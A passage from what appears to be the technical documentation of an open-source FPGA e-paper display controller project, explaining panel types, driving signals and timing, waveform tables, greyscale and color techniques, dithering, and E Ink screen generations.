high-voltage drivers to drive the TFTs and the pixels. Virtually all E-paper panels use either COG (Chip-on-Glass) or TAB (Tape Auto Bonding) to integrate some chips onto the screen panel itself. Most of the screens available today can be divided into two categories based on whether or not the controller is integrated in: Here is a non-exhaustive list of the types based on their size: (the size or resolution is not related to or limited by the type, it is just for a certain size, and the vendors tend to make them the same type.) Screens without controller: 4.3", 6.0", 7.8", 8.0", 9.7", 10.3", 13.3", 25.3", 31.2", 42" Screens with controller: 1.02", 1.54", 2.13", 2.6", 2.9", 3.71", 4.2", 5.65", 5.83", 7.5", 12.48" One may notice that almost all e-readers/ e-ink cellphones use screens without controllers, while almost all e-ink electronic shelf labels (ESL) use screens with controllers. This gives some hints about the advantages and disadvantages of two types: | | Without Controller | With Controller | |-|-|-| | System Cost | High. A dedicated controller or SoC with an integrated controller is usually required. Needs a dedicated power supply. | Low. Virtually any MCU could drive the screen directly, and the power supply is integrated in. | | Greyscale Levels | Generally 16 (4bpp), up to 32 (5bpp) | Generally 2 (BW only) or 4 (2bpp), with some hack, up to 16 (4bpp) | | Refresh Speed | Generally fast (100ms~300ms) for BW. Depends on the screen used and the system architecture | Generally fast (100ms~300ms) for BW if the partial refresh is enabled. Greyscales are much slower, BWR or BWY screens would be even slower. | Total Update Latency | Generally the same as refresh time. Depends on the system architecture | Slow. Ranging from 100ms to several seconds based on the resolution. | Please keep in mind the discussion is about off-the-shelf screens you can buy today. These tradeoffs do not necessarily come from the fact the controller is integrated or not. Note that I mentioned the refresh speed and total update latency. They are different: The refresh speed refers to the time it takes to start refreshing the screen: from starting to seeing screen changing, to the screen finish showing the new content. The total update latency refers to the latency when the processor needs to update the screen, to the screen finish showing the new content. As you can see, this is the biggest issue for screens with controllers. This is the main reason why they are rarely used on e-readers cell phones or PC monitors. This diagram illustrates the difference between the two. It should be noted that the screens without controllers have the flexibility to be driven quickly, but the system designer might not architect the system for low latency. Using Screen with Integrated Controller Screens with integrated controllers have almost everything already integrated. Common display panels of this type only need a few external capacitors, inductors, and MOSFETs to support the integrated bipolar power supply circuit, then it could be hooked up to MCUs or MPUs using common interfaces like SPI or I2C. There are a lot of driving boards and examples of these screens available online. To be expanded (TODO) Using Screen without Integrated Controller This could get complicated. Note I used a lot of "generally" in the previous comparison table because there are many things one could do to drive them. Some of them would certainly impact the performance. The main issue here is the controller chip. There are three solutions to drive these screens: Using a dedicated controller chip to drive the screen Using an SoC that has an integrated controller Using a fast MCU/SoC to emulate the controller with GPIO (software timing controller) Then, again here is a comparison between them: | | Specialized controller chip | SoC with integrated controller | MCU + Software TCON | |-|-|-|-| | Resolution | UXGA+ | UXGA+ | Limited by MCU RAM. Up to XGA with SRAM, UXGA with PSRAM, UXGA+ with DDR | | Greyscale | Up to 32 | Up to 32 | Up to 32 | | Partial Update | Yes | Yes | Yes | | Total Update Latency | Depends. Could be very close to refresh speed, could be slow like screens with controller | Same as refresh speed | Same as refresh speed if data is internally generated (not streaming from an external device such as a PC) | | Suitable Applications | IoT devices, E-readers, cellphones, E-ink monitors. possibly E-ink laptops | Advanced IoT devices, E-readers, cellphones, E-ink typewriters, possibly lower performance E-ink laptops | When using MCU: IoT devices, large ESLs, simple DIY E-readers. When using MPU: Same as SoC with integrated controller | When using a dedicated controller, it could accept data from external devices. This allows it to be used in various different types of applications. Ranging from IoT devices, and ESLs, to PC monitors with relatively fast refresh rate and low latency. When using SoC or MCU, the display content is generated by the SoC or MCU itself, which ultimately is limited by the capability of the SoC or MCU. Given the current SoCs with E-ink display controllers are usually limited in performance, the application is limited. The same goes for MCU, it does what an MCU could do. You could find ways to stream video data into SoC or MCUs by using USB, camera interface, WiFi, etc., but this might not be optimal. Existing Solutions Specialized controller chip Closed-source EPSON S1D13xxx: Widely used EPD controller in early E-readers. Proprietary, no documents available. Probably EOL. IT8951: Used on the waveshare EPD Hat. Documents are available. It works with large EPDs up to 2048x2048. The drawback is the speed as the interface between processor and IT8951 could be slow. This is similar to the situation on screens with integrated controller T1000: Also known as IT8957, upgraded model of IT8951. It supports even higher resolution. It features a higher speed MIPI DSI interface to mitigate the slow speed of IT8951. Waveshare HDMI driver board: FPGA-based controller. Closed source but easily purchasable, could be integrated into larger projects as a module. Open-source This project (Caster + Glider): FPGA-based controller, multiple update modes, ultra-low latency processing, and wide range of screen support. https://hackaday.io/project/21607-paperback-a-desktop-epaper-monitor: FPGA-based controller. However, doesn't support partial update mode and slower speed. https://hackaday.io/project/21168-fpga-eink-controller: FPGA-based controller supports vendor waveform with reasonable speed. SoC with integrated controller RK29xx: Fairly old, Cortex-A8 based (RPi 1 level performance), 55nm, EOL RK3026/RK3028: Fairly old, Cortex-A9 based (RPi 2 level performance), 40nm, EOL i.MX 50: Fairly old, Cortex-A8 based (RPi 1 level performance), 65nm, in production i.MX 6ULL: Cortex-A7 based (RPi 1 level performance), 40nm, in production i.MX 6S/D: Fairly old, Cortex-A9 based (RPi 2-3 level performance), 40nm, in production i.MX 7S/D: Cortex-A7 based (RPi 2 level performance), 28nm, in production i.MX 8ULP: Cortex-A35 based (RPi 2 level performance), 28nm FD-SOI, in production AW B200: Cortex-A53 based (RPi 2 level performance), 28nm, in production MT8113: Cortex-A53 based (RPi 2 level performance), 12nm, in production RK3566/RK3568: Cortex-A55 based (RPi 3 level performance), 22nm, in production RK3576: Cortex-A72 + A53 based (RPi 4-5 level performance), 8nm, in production MCU/SoC + Software TCON http://essentialscrap.com/eink/waveforms.html: One of the earliest e-ink hacks. Limited in performance but still could be used as a reference NekoCal: One of the earliest e-ink software TCON with greyscale support. Used to be available as a DIY kit. No longer updated, still could be used as a reference InkPlate 6/10: Commercially available. Based on ESP32. EPDiy: Based on ESP32, supports a lot of different screens, recommended if want to build some device with ESP32+Eink or embed it into a larger project. Interface Signals and Timing The interface signals and timing are fairly similar to LCDs without a controller. Following is the list of signals typically found on EPDs: GDOE/ MODE: Gate driver output enable GDCLK/ CKV: Gate driver clock (like HSYNC in LCD) GDSP/ SPV: Gate driver start pulse (like VSYNC in LCD) SDCLK/ XCL: Source driver clock (like PCLK in LCD) SDLE/ XLE: Source driver latch enable (like HSYNC in LCD) SDOE/ XOE: Source driver output enable SDCE/ XSTL: Source driver start pulse (like DE in LCD) SD: Source driver data (8-bit or 16-bit) SD signals go into the source driver, typically in the X direction. GD signals go into the gate driver, typically in the Y direction. It's a 2D array, the gate driver selects one line at a time, and the source driver outputs the voltage for all the pixels in that line. Conceptually, it's like a raster scan on a CRT. To send one field of data, both GD and SD are reset to the start position by using the start pulse signal. Data are then transmitted into the source driver 4 or 8 pixels at a time. Once the line has been fully transmitted, the source driver is reset to the beginning position by a start pulse signal, and the gate driver moves to the next line by a pulse on the gate driver clock. Once all lines have been scanned, the entire process repeats for the next field. One notable difference with LCD is that each pixel is represented by 2 bits. This, however, doesn't mean each pixel is 2bpp or 4-level greyscale. The 2-bit per pixel is used to encode the voltage applied to the pixel: 00: No voltage 01: Negative voltage 10: Positive voltage 11: No voltage Just like CRT/ LCD, there are also blanking periods in the entire timing (which means it's just waiting without active pixel data being sent). They have identical meanings to CRT/ LCD systems: (Source: https://projectf.io/posts/video-timings-vga-720p-1080p/, Copyright Will Green) The following is a piece of pseudo-code implementing the Eink timing: ```c define DATA_BUS_WIDTH 8 // 8bit wide bus define PIXEL_PER_CYCLE (DATA_BUS_WIDTH / 2) define VFP 12 // Vertical front porch define VSYNC 1 // Vertical sync length define VBP 2 // Vertical back porch define VACT 758 // Vertical active lines define HFP 72 // Horizontal front porch define HSYNC 2 // Horizontal sync length define HBP 2 // Horizontal back porch define HACT (1024 / PIXEL_PER_CYCLE) void pulse_h_clock() { sdclk = 1; sdclk = 0; } void drive_line(bool v_in_act) { sdce = 1; gdclk = 0; for (int i = 0; i < HFP; i++) pulse_h_clock(); sdle = 1; gdclk = 1; for (int i = 0; i < HSYNC; i++) pulse_h_clock(); sdle = 0; for (int i = 0; i < HBP; i++) pulse_h_clock(); if (v_in_act) sdce = 0; for (int i = 0; i < HACT; i++) { send_data(); pulse_h_clock(); } } void drive_frame() { gdoe = 0; sdoe = 0; gdsp = 1; for (int i = 0; i < VFP; i++) drive_line(false); gdsp = 0; gdoe = 1; sdoe = 1; for (int i = 0; i < VSYNC; i++) drive_line(false); gdsp = 1; for (int i = 0; i < VBP; i++) drive_line(false); for (int i = 0; i < VACT; i++) drive_line(true); } ``` More explanation can be found at http://essentialscrap.com/eink/index.html Understanding Waveform The waveform is a look-up table for the eink controller to determine how to drive the pixels, mostly useful for greyscale image display, but generally used for binary image display as well. The look-up-table has 3 inputs (dimensions): frame number, source grayscale level, and destination grayscale level. During the update process, for a certain pixel, the source and destination level stays the same, and the frame number increases each frame. The look-up process is done for every pixel every frame. The controller may choose different LUTs depending on the ambient temperature. Mode switching is also implemented by simply switching between different LUTs. This is essentially what typically eink controller does. For each pixel, look up in the table to determine the voltage to use. Repeat this for a couple of frames with an incrementing frame counter, until all pixels are fully driven. It should be obvious that the waveform file itself is independent of the resolution as the waveform only cares about a single pixel. With an incorrect or un-optimal waveform, the screen should at least display some recognizable image. Waveform Example There are several sample waveform tables provided in the project repo. Take the GC16 (Greyscale clearing 16-level) waveform of GDEW101C01 as an example: https://github.com/zephray/NekoInk/blob/master/waveform/gdew101_gd/test_M2_T0.csv Take one line from that file: 6,13,0,0,0,0,0,0,0,0,0,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,0 This means from greyscale level 6 to level 13, it needs to go through the following sequence. Each number means the operation on that frame, 0 is no-operation, 1 is darken, and 2 is lighten. In this case, there are 38 frames, first 9 frames do nothing, then lighten for 1 frame, darken for 10 frames, lighten for 16 frames, and finally darken for 1 frame and have no operation for the last frame. This is the sequence to change a pixel from level 6 to level 13. Such lookup is done for every pixel on every frame. For specifics on waveform file formats, check the Working with Waveforms section. Waveform Modes To give system designers more flexibility, Eink controllers often offer multiple "modes", like binary mode, 16-level grayscale mode, 16-level grayscale mode with reduced flashing, 4-level grayscale mode, etc. The waveform provided by Eink has many modes. There is a good document from Eink describing the modes: https://www.waveshare.net/w/upload/c/c4/E-paper-mode-declaration.pdf It provides a good overview of the modes. I am just going to add some comments. GC in the GC16 stands for "greyscale clearing". GC does not stand for greyscale. There are 16-level greyscale modes that aren't called GC16. Officially there are no 32-level greyscale modes (yet). There are 5-bit waveforms, which means they internally use 5 bits for each pixel, which potentially allows up to 32-level greyscale, but no such waveform exists (yet). There are no 16-level greyscale modes without flashing. The DU4 is the only greyscale mode that's non-flashing. The GL16 mode, as described, only works for black text on a white background. When refreshing greyscale images, the GL16 is similar to the GC16. The GLR16 mode is also called the REGAL mode, and the GLD16 mode is also called the REGAL-D mode. Eink doesn't even know if it should be spelled as REAGL or REGAL: Google search "REAGL site:eink.com" and "REGAL site:eink.com" both returned several results. Eink-provided waveform usually implements all these modes, however it is not always required. The waveform file may also contain waveform tables in other orders. In terms of the waveform, the waveform for GL16, GLR16, and GLD16 are identical. This is expected, the REGAL requires an additional algorithm on the host image processing and is not a technology based on tweaking the waveform. Waveform Tweaks Some commercial implementations allow users to reduce the frame count and/ or alter the waveform playback speed, so the user can trade between contrast ratio and frame rate. Greyscale Display Other than full white and full black, with appropriate modulation, Eink screens can also display some levels of greyscale (typically 16). For grayscale displays, the basic idea is simple. If the pixel is not fully driven (say only drives for 50ms while it takes 100ms to reach full black/ white), it would stay in a gray state. There are two ways of achieving this modulation: - Modulate the frame time - Modulate the number of frames with constant frame rate Both are possible, as described below Frame Time Modulation This method changes the drive time by changing the length of a single frame. The screen would only be driven for 15 or 31 frames for 16-level and 32-level greyscale, but the frame time (thus frame rate) is altered to provide the desired driving time. The LUT would be a one-dimension look-up table, only containing the incremental time required to drive to the next greyscale level. The source/ gate driver output enables the line to be toggled to achieve the desired driving time. This method doesn't seem to be implemented in any commercial solutions and is significantly slower than the second method. But it certainly works. The 32-level greyscale demo shown in the picture above is achieved using this method. Frame Count Modulation This method changes the drive time by changing the number of frames being applied to the screen. The screen is still being driven at a constant frame rate. The following is a simplified hypothetical waveform table for achieving 4-level greyscale: | Previous State | Target State | Frame 0 | Frame 1 | Frame 2 | Frame 3 | Frame 4| |-|-|-|-|-|-|-| | Black | Black | NOP | NOP| NOP | NOP | NOP | | Black | Dark Grey | VPOS | VNEG | VPOS | NOP | NOP | | Black | Light Grey | VPOS | VNEG | VPOS | VPOS | NOP | | Black | White | VPOS | VNEG | VPOS | VPOS | VPOS | Note how it alternates between VPOS and VNEG in the beginning. This is often called the "activation phase" to improve the contrast ratio. Putting this detail aside, it changes the number of VPOS frames to settle down on different grey levels. The actual grayscale driving sequence used in the commercial implementation is more complex than that, often involving switching the pixel towards black/white a few times before settling. This design is partially due to the limited time control granularity and other temperature/ manufacturing variance-related concerns. Some side-effects of such a driving sequence are that the refreshing process is “flashing”, and is slower compared to displaying only a 1-bit binary image. Color Display There are several different technologies that could be used to build full-color EPDs. The 2 most common ways are to use a color-filter-array (CFA) or use a multi-pigment color display. The following picture has the multiple pigment color display (ACeP Gallery 3) on the left, and a CFA-based color screen (Kaleido Plus) on the right, displaying the same image. (Original illustration copyright MiHoYo) Color Filter Array CFA stands for color filter array, which is colored glass/ film on top of the screen pixel. This is also the technology used on most color LCDs. Eink Kaleido, Eink Triton, and color DES are based on this technology. The main advantage is that it's relatively simple to control, and the low-level driving is the same with the greyscale panels. Thus it has the same level of refreshing time (100~200ms), and the same level of greyscale (16 level translate to 16^3=4096 colors). The drawback is that the CFA filters out some light (due to its colored nature), and the screen reflectivity is negatively affected by the CFA. The screen ends up being quite dark. Up to now, most color E-readers use CFA-based displays. This project supports all three major types of CFA-based EPD screens: color DES screen, Eink Triton, and Eink Kaleido. Case Study: GDEW101C01 (CFA-based, DES) The GDEW101C01 is a 10.1" color DES screen made by Good Display / WeiFeng Tech. It uses CFA to produce color images. As a result, to the eink controller hardware, it's just a normal greyscale panel with a bunch of pixels. However, the pixels are colored depending on their location due to the CFA. The coloring of the pixels can be either handled by hardware or software. Pixel Arrangement Color DES is a bit different from a typical color TFT LCD in terms of CFA design. Typically on TFT LCDs, one RGB pixel is called a pixel, and each R/G/B component is called as a sub-pixel. On color DES, the sub-pixel ends up being called a pixel, and each pixel is either red, green, or blue. In the display industry, such pixels are more commonly referred to as dots. Pengo, CC BY-SA 3.0 https://creativecommons.org/licenses/by-sa/3.0, via Wikimedia Commons The actual photo of the DES panel under the microscope: In the above photo, the DES pixel arrangement is the same as the OLPC XO-1. Notably, many Eink's Kaleido 3 (but not all) also uses the same pixel arrangement. Having no subpixel / each pixel only has 1 color doesn't necessarily mean that the effective resolution needs to be divided by 3. This arrangement is slightly more "efficient" than the RGB strip in terms of perceptive resolution. You can find a more detailed analysis in the paper Comparing the Effective Resolution of Various RGB Subpixel Layout. Processing image for Color DES If the image is displayed on color DES without any processing, it would look like a greyscale image. This is similar to when you just send the same color value to R/G/B components on a color LCD. To get color, send only the color component that corresponds to the pixel color. (Source: https://wiki.laptop.org/go/File:PixelLayoutDiagonal.png, public domain) For example, for pixel 01, the pixel on the screen is green. Then only the green component from the frame buffer should be sent to the screen. To get a basic 4096 color image display, this is everything needed. However generally to improve image quality, a few more steps are applied: Low pass filtering The previously described image-displaying process is essentially a down-sampling process for each color component: Only 1/3 of the pixels are sent to the screen. Then this becomes a classic signal processing issue: sampling the signal would cause frequency components above Nyquist to fold back to the low frequency part. Or in simpler words, you would see jagged edges/ aliasing, which are things that weren't present in the original image. To prevent this, low pass filtering (blurring) needs to be applied first to the image to remove these high-frequency components. The following diagram from the OLPC wiki shows a simple way of implementing a such filter: (Source: https://wiki.laptop.org/go/File:PixelProcDiagonal.png, public domain) Dithering Dithering can be applied to further improve image quality. See the dithering section for more details. Multi-Pigment Color Display Another technology for implementing color EPD is by using a multi-pigment color display. This is a technology developed initially by SiPix and further improved by Eink. The basic idea is to use ink particles with different colors inside a single pixel. By applying a sequence of voltages, the ink particles can be arranged to display different colors. (Source: https://www.eink.com/tech/detail/How_it_works , copyright Eink Corporation) One major advantage of this solution is it can achieve higher resolution (because it doesn't have a CFA, so no resolution reduction), higher reflectivity (because it doesn't have a CFA, so no light loss), and higher color saturation (because it doesn't have a CFA, no need to play the reflectivity vs saturation trade-off game). Eink has 2 lines of products using this Technology, Eink Gallery and Eink Spectra. The advantage is it's much brighter compared to CFA-based solutions. The disadvantage is it's much more difficult to drive, and quite slow: 1st /2nd gen Eink Gallery screen takes 30s (!) to refresh, and Spectra 6 Plus devices take 7s to refresh. It's possible to trade in some color saturation for higher speed, though still much slower than CFA-based solutions. The specific product lines will be discussed in Eink Screen Generations How ACeP Waveform Works To be written (TODO) How to get more colors on ACeP This is possible with a modified waveform. To be written (TODO) What Happened To ACeP? ACeP was supposed to be the "next big thing" in ereader . Back in the end 2022, Eink announced that "Gallery 3 has moved into mass production, with customer products from Bigme, BOOX, iFlyTek, iReader, PocketBook, Readmoo, and AOC coming down the pipeline in 2023 and beyond" . But 2023 passed with exactly one product, the Bigme Galy, with mixed receptions. Early 2024, it was announced that Bigme Galy has been discontinued , and Eink has announced EOL for certain ACeP-based products . It does sound like ACeP is now dead. The following are purely my speculation. But I see this as 2 separate decisions: ~~There will be no more multi-pigment-based displays for the eReader market~~ ACeP (CMYW) is being replaced with Spectra 6 (RYBW) in other markets The second one is evident from the EOL notice linked previously, the 7.3" ACeP screen has a direct replacement of the 7.3" Spectra 6 screen. One major drawback of ACeP in the digital signage market (as far as I see) is its inability to reproduce the cyan color. This actually means there is no good way to display blue sky on an ACeP screen, not even through dithering, it's simply outside of its color gamut. By changing the base colors used, Eink was able to mitigate this issue in the Spectra 6 product lines. The first one is more or less speculation. (UPDATE: I WAS WRONG, read on) I have two clues for that. One is the fact that Eink is doubling down on digital signage for Spectra 6: Both 13.3" and 31.5" Spectra 6 screens will have integrated controller . This make them much more interesting for the signage applications, but unsuitable for eReader applications. The other is that the 8" Spectra 6 Plus screen , while using the same backplane as the Gallery 3 ACeP screen, now quote a 7 second refresh time (compared to less than a second on Gallery 3). If Eink still wanted to make a Spectra 6 eReader screen, this 8" backplane would be the one to use given it was used in the ACeP product line. Objectively, the ACeP screen on the Bigme Galy pretty much doesn't make any sense anyway. It suffers from poor reflectivity and poor saturation to a point where it's not much better than Kaleido (see the previous photo). The difference between Gallery 3 and Gallery Palette (which is supposed to be a lower-end product) is also stunning: (Original illustration copyright MiHoYo) The one on the left is the Gallery 3 used on eReaders, and the one on the right (brighter and more saturated one) is the Gallery Palette used on ESLs. Though to be honest I hacked the right one a bit to display 512 colors opposed to the stock 7 colors. If Gallery 3 had the same image quality as previous ACeP/ Gallery screens, it would make sense to trade in response time for better image quality. But it doesn't. So is the ACeP dead? Yes and no. ~~Yes in the sense that we are less likely to see any new ACeP products in the future~~, and we are also unlikely to see any Spectra 6-based eReader products. No in the sense that ACeP is superseded by Spectra 6, so the technology lives on. Just like how the Pearl replaced the Vizplex, and the Carta replaced the Pearl. Now we have Carta so we don't look back to the older generation of screens. Also, in another sense, there are likely at least thousands of ACeP screens already manufactured but haven't been made into consumer devices. We will probably see these screens in the not-too-distant future! UPDATE: As pointed out in a reddit post by Disastrous_Analyst_1 , Eink in their 2023 Annual Report said that "In 2024, we will provide an upgraded version of the 8-inch advanced color ePaper (Gallery™ 3), aiming to deliver optimized performance and enhanced visual experience for customers. (在 2024 年,我們將進一步提供進階版 8 吋先進彩色電子紙(Gallery ™ 3),期待能提 供更優化的性能及更好的視覺體驗給客戶)" in V. Operational Highlights, 5.1 Business Activities, 5.1.2 Industrial Overview, 3. Product Developmenet Trends, A. eReader. This means we might be able to see more Gallery 3 (or similar technology) based eReaders in the years to come. Dithering Eink and DES panels typically only support up to 16 levels of greyscale with the vendor-provided waveform. To improve response time, or to avoid flashing images, a binary (1-bit, 2-level) display is also used. Dithering could be applied to produce better images (increasing SNR, in signal processing sense). The following is applying dithering to a simple black-to-white gradient. Note the results are not optimal due to limitations in quantization and incorrect gamma correction. But the idea is the same. | Original | Binary No-dithering | 2 Row Sierra Dithered | |-|-|-| | | | | Dithering can help when the screen has a native 16-level greyscale as well: | Original | 16 Level Greyscale No-dithering | 16 Level Greyscale Dithered | |-|-|-| | | | | As you can see, the non-dithered image loses all the greyscale in between, while the dithered version on the right gives the illusion of greyscale while only using full black and full white colors. To understand it further, take the following example: Say the source image is 30% brightness (or 0.3). This cannot be displayed on a binary screen which can only display 0% (0.0, black) or 100% (1.0, white) brightness. A simple thresholding process is added to determine if the screen should display 0 or 1 by checking the incoming brightness. If it's less than 0.5 then the display brightness is rounded down to 0, otherwise 1. Because 0.3 is always lower than 0.5, the whole screen displays 0 (black). This is less than ideal. A better way is to set around 30% of the pixel black, while 70% of the pixel white. Different dithering algorithms can be used to achieve this 30/70 distribution. Two common methods used are ordered dithering and error-diffusion dithering, which will be described below. Ordered Dithering The ordered dithering adds a pre-computed/ fixed texture to the image before the thresholding process. In other words, it basically adds some noise to the image. This may sound weird initially, but it should be easy to see the effect of noise in the example. Using the example previously described displaying 30% brightness grey on a binary screen. The goal is to let the rounding process end up with 0 for 30% of the time and 1 for 70% of the time. This could be achieved by adding a noise. In the simplest case, a random number with a uniform distribution between [-0.5, 0.5] is added to the incoming brightness. The brightness has a value of 0.3, when adding this number to the random number, the random number now has a uniform distribution between [-0.2, 0.8]. The threshold is still set to 0.5, and now the probability distribution can be seen as below: The pixel now has a 30% chance of being rounded up to 1, and a 70% chance of being rounded down to 0. Before dithering, it would always be rounded down to 0. However, a purely random number is generally not the best noise to use. Bayer dithering matrix and blue noise are more commonly used, with the results as illustrated below. The idea is the same, but instead of adding random numbers, a pre-computed number from the Bayer dithering matrix (array) or blue noise texture (array) is added to the image. | Random Dithering| Bayer Dithering | Blue-noise Dithering | |-|-|-| | | | | Error-Diffusion Dithering The basic idea is when rounding down the color (selecting the closest color from the 16-level greyscale from 256-level input), the error value (difference) is calculated and added to neighboring pixels (so this error would be considered when processing these pixels later). The whole process is called error-diffusion. Still using the previous example of a 30% brightness image, and assume an extremely simple dither kernel: diffuse all error to the next pixel. Let's see it in action. In the first pixel, 0.3 (image brightness) is less than 0.5 (threshold), so it's displayed as 0 (black). This introduces a 0.3 error: the displayed color is 0.3 darker than the requested color. So 0.3 is being diffused to the next pixel, hoping the next pixel can correct the error. Onto the second pixel. The value is 0.3 (image brightness) + 0.3 (diffused error) = 0.6. It's now larger than 0.5 (threshold), so it's displayed as 1 (white). This introduces a -0.4 error: the displayed color is 0.4 brighter than the requested color. -0.4 will be diffused to the next pixel. For the 3rd pixel, the value is now 0.3 - 0.4 = -0.1. This is less than 0.5 and displayed as 0 (black). Error -0.1 is diffused further. And this process just goes on. With enough pixels, eventually, it would yield about 30% of white pixels and 70% of dark pixels. Similar to how random value is not the best thing to do in ordered dithering, dithering to the right is also less than ideal. It creates very repetitive patterns. I mentioned the word kernel. Error diffusing uses a diffusion kernel, which specifies the target and percentage of the diffused error. There are many classic kernels, such as Floyd-Steinberg, Stucki, Sierra, etc. commonly used for image dithering. They all diffuse to more than 1 pixel to improve the overall look of the image. As shown below, even just diffusing the error to 2 pixels (half of the error goes to the pixel on the right, and the rest half of the error goes to the pixel on the bottom) yields a much better result: | Dither to Right | Right and Down | Floyd-Steinberg | |-|-|-| | | | | Applying Dithering on CFA-based Color Screens Dithering can be applied on CFA-based color screens such as Eink Kaleido and color DES screens as well. The following is on a simulated DES screen: (The left original is assuming the screen has a native 24bpp color, still on a simulated screen) | 16M color DES (does not exist) | 8-color DES | 8-color DES Dithered | |-|-|-| | | | | Ordinary dithering kernels don't work too well on color screens. For example, the error-diffusion dithering process pushes/ diffuses error neighboring pixels without considering their color. Ideally, it should push/ diffuse the error only to pixels with the same color. This is fairly easy to fix though, by tweaking the kernel it would achieve good results on CFA-based screens as well. (I am going to shamelessly call it Wenting's kernel) | 16M color DES (does not exist) | 8-color DES naively apply Floyd-Steinberg (wrong) | 8-color DES with Wenting's kernel | |-|-|-| | | | | Of course, one can apply Bayer-like ordered dithering, blue noise dithering, or dithering on 4096-color mode as well: | 8-color DES Bayer-like | 8-color DES Blue-noise | 4096-color DES Error-diffusion | |-|-|-| | | | | It's called bayer because, similar to how naively doing error diffusion doesn't work, the bayer matrix has to be modified to work on the color screen. Gamma Correction Another thing to consider is gamma. The dithering process involves a step of selecting the closest value. However, selecting the closest numerical value does not necessarily mean the closest color. The image typically is in sRGB space, which is non-linear. This causes the simple rounding to pick the wrong color, also calculating the wrong error value. One solution is to work in the linear space. This is also known as gamma-aware dithering. You could read more related info online, for example here: https://learnopengl.com/Advanced-Lighting/Gamma-Correction . The difference is quite evident when dithering down to 1 bit for a color screen. The top left is the original image, the top right is dithering in the sRGB space, and the bottom left is dithering in the linear space. Further Reading See https://en.wikipedia.org/wiki/Dither for more information about dithering. Eink Screen Generations Depending on how you count, there are multiple generations of Eink screens commercially available. For monochrome screens before 2023, it's possible to tell the generation by looking at the 6th digit on the serial number: That is the FPL code in the following table: | FPL Platform | FPL Code | Panel Model | Marketing Name | First Introduced | | ------------ | -------- | -------------- | ----------------------- | ---------------- | | 2.0 | 0 | | | ? | | 2.1 | 1 | | | 2004 | | 2.3 | 2 | | | ? | | V100 | 3 | | Vizplex | 2007 | | V110 | 4 | | Vizplex | 2008 | | V110A | 5 | | Vizplex | 2008 | | V220 | 6 | VA3200 | Pearl | 2010 | | V250 | 7 | | Pearl | ? | | V220E | 8 | | Pearl | ? | | V320 | 9, R | VB3300 | Carta 1.2 / 1000 | 2013 | | V320 | ? | VB3300? | Carta 1100 | 2019 | | V400 | A, C | VD1400/ VD1405 | Roadrunner / Carta 1200 | 2021 | | V450 | ? | VH1948 | Carta 1250 | 2021? | | ? | ? | VD1405 | Carta 1300 | 2023 | Data points used to create the table above: - The first commercialized Eink e-reader SONY Librie hit the market in 2004, likely with an ED060SC1 panel - ED060SC1 has an FPL code of 1 on the barcode, meaning the 2.1 platform - Multiple datasheets (like the one for ED060SC4) confirms the 6th digit marks the FPL code with mapping for V220/220E/320/400 - Inkwave's WBF decoder (originated from Kindle GPL kernel code) provides an FPL platform to an FPL code mapping table that matches well with info from the datasheet - Kindle Oasis3 was reported to use a Carta 1100 screen, and it has an ED070KC3 screen with a V320 FPL platform - Kindle PW5 was reported to use a Carta 1200 screen, and it has an ED068KC5 with a VD1405 panel model - Kobo Clara BW was reported to use a Carta 1300 screen, and it has an ED060KHE with a VD1405 panel model - The datasheet of ED068KC1 mentioned the name "Roadrunner" for the 400 platform, but that name never gets used outside of that. I would guess they were going to use the Roadrunner for the new generation but eventually fell back to Carta 1200 so it's more like an incremental improvement - From the information available, it really looks like Carta 1000 and 1100 use the same film, and Carta 1200 and 1300 use the same film. If this is true, it may sound like a scam if they are named differently but use the same film. But this is actually okay. Just like how chips usually have a binning process, the same chip would sell under different product names with different performance levels. It's reasonable for Eink to do incremental improvements on the manufacturing process to yield better screens with the same film and call it under a different name, or simply binning screens to different grades and selling under different names. I will let you decide how to count the generations. For the CFA-based screens, the following generations of screens exist: Eink Triton: First generation color screen. Uses an RGBW glass color filter and square pixels. The underlying screen panel uses Pearl film. Eink Triton 2: 2nd generation color screen. Uses RGB glass color filter and stripe pixel. The underlying screen panel uses Pearl film. Eink Kaleido: 3rd or 2nd gen color screen depending on the definition. Uses an RGB color filter. Each pixel is still square, but each color covers 3 pixels. The underlying screen panel uses Carta film. Eink Kaleido Plus: 2nd gen Kaleido. Uses an RGB color filter. Each pixel is still square but different configurations exist. Some screens have each color covering 2 pixels, some others have each color covering only 1 pixel. The underlying screen panel uses Carta film. Eink Kaleido 3: 3rd gen Kaleido. There are at least 2 different configurations exist. One features RGB filter covering 1 pixel per color, the other features a 2R/2G/1B configuration, on average 5/3 pixels per color. The underlying screen panel uses Carta 1000/1200/1250/1300 film depending on the model. Eink Kaleido 3 Outdoor: Wide temperature version of Kaleido 3. As far as I know, all CFA-based color screen panels don't come with an integrated controller. For the multiple-pigment color screens based on SiPix technology, the following generations of screens exist: (Color abbreviation: B: black, W: white, R: red, Y: yellow, B: blue, C: cyan, M: magenta) Eink Spectra 3000: BWR or BWY 3 color screen. Eink Spectra 3100: BWRY 4 color screen. Eink Spectra 3100 Plus: BWRY 4 color screen. The orange display is now possible with driver circuit changes Eink Spectra 6: RYBW 4 color screen. Can reproduce 6 different colors by mixing colors Eink Spectra 6 Plus: RYBW 4 color screen. Still reproduces 6 different colors. Allows faster refresh compared to 6 with driver circuit changes Eink Gallery (also known as Gallery 4000): CMYW 4 color screen (ACeP). Eink Gallery Plus (also known as Gallery 4000): CMYW 4 color screen (ACeP). Eink Gallery Palette (also known as Gallery Palette 4000): CMYW 4 color screen (ACeP). Reproduce 7 different colors. Eink Gallery 3: CMYW 4 color screen (ACeP). Reproduce around 10 different colors, much faster than other Gallery screens at the cost of lower saturation and lower reflectivity There are both integrated-controller Spectra/Gallery screens and controller-less Spectra/Gallery screens. Additional notes regarding the multi-pigment color screens: ACeP, or Advanced Color ePaper refers to the CMYW 4 color screen. Is not a product line on its own To be honest, I don't know how many colors can be reproduced on Gallery or Gallery Plus screens based on public information. The spec sheets for AC133UT1 suggests it might be 8 colors. Eink claims 32000 or 60000 colors in their materials, but they also clarified these numbers refer to color gamut. In other words, they represent color saturation rather than a number of different colors that can be displayed on screen. Dithering is heavily used to display color images on Gallery screens. It's possible to achieve more colors on Gallery Palette screens. 7 is not a physical limit. The Gallery 4000 rebranding happened in 2020 however Eink never seems to use that name on their website. Design of Caster and Glider This section describes the design specific to the Caster and Glider. The following is an overall block diagram showing both hardware and gateware components in the signal chain: Gateware Architecture The FPGA gateware is divided into multiple modules. The caster.v is the top-level of the EPDC core design, but several additional components are connected under top.v to form a complete image processing system. Different components are generally inter-connected with synchronous 